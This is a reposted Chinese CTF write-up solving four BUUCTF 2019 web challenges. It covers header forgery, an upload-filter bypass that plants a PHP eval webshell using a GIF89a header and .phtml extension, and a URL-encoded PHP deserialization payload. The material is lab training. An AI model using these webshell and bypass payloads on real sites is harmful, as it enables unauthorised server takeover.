| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> BUUCTF-web极客大挑战 -> 正文阅读 |
|
[PHP知识库]BUUCTF-web极客大挑战 |
目录 [极客大挑战 2019]Knife
这是一个典型的后门程序,用蚁剑链接复制url,密码则是页面中给的密码Syc。 在根目录下找到flag文件,得出flag。 ? [极客大挑战 2019]Http打开页面后查看源代码,发现一个php文件 打开链接node4.buuoj.cn:25883/Secret.php,给出了提示,说它不是来自https://Sycsecret.buuoj.cn这个页面,所以要对referer进行修改。 ?使用burp对这个页面抓包,然后加上
send ? 意思就是说需要用Syclover浏览器,也就是需要改消息头的User-Agent参数?,将Mozilla改为Syclover就行了。 send,又出现了新的提示 ? 意思是只能本地访问,所以加上
?找到flag [极客大挑战 2019]Upload?这道题是文件上传,先上传一个文件试一试,发现说不是图片 ? ?所以使用burp抓包,对Content-Type进行修改为imaeg/gif,出现了提示
将后缀修改为phtml 出现了新的提示 ?
也就是说上传文件里不能包含:" <? "? ? ? 所以用 script标签 绕过“<?”限制:<script language='php'>@eval($_POST['cmd']);</script> send而后出现提示,就是说这不是图片 ?所以,在文件前面加文件头:GIF89a,php会检测其为gif图片。使用getimagesize函数无法判断其图片是无效的。成功上传一句话木马,然后使用蚁剑链接,而上传文件一般都在 所以url:http://1992c45f-fa67-4b72-9b9a-4e2ed19764a5.node4.buuoj.cn:81/upload/1.phtml 密码则是:cmd 在根目录下找到flag ? [极客大挑战 2019]PHP?打开页面 ?备份引起了我的注意,尝试使用www.zip为后缀,得到一个压缩包。 ?里面有以flag为名的文件,但是提交后是错误的 看一下index,发现了一段php代码,是反序列化
?而class.php却更加复杂
? 分析代码应该是要求我们username=admin,password=100时得到flag 所以
? ?加上后缀 ?/index.phpselect=O%3A4%3A%22Name%22%3A3%3A{s%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B} 得出flag
? |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/26 4:02:24- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |